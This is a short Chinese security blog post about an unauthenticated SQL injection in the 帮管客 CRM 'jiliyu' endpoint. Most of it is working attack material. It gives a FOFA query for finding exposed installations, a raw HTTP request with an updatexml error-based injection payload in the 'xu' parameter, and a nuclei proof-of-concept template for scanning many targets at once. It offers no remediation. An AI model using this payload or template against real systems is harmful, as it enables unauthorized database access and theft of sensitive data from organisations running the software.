帮管客 CRM jiliyu SQL注入漏洞

原创

samRsa

发布于 2024-03-12 09:15:13

1450

发布于 2024-03-12 09:15:13

1、fofa语句

app="帮管客-CRM"

2、数据包

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: XXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

3、复现截图

4、nuclei POC

基本命令： nuclei.exe -l 网址文件.txt -t POC.yaml

id: BGK-CRM-indexphp-jiliyu-SQL

info:
  name: 帮管客CRM 客户管理系统/index.php/jiliyu 接口存在 sql 注入漏洞，未经身份认证的攻击者可通过此漏洞获取数据库敏感信息
  author: someone
  severity: high
  metadata: 
    fofa-query: app="帮管客-CRM"
http:
  - raw:
      - |
        GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36


    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"@")

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

安全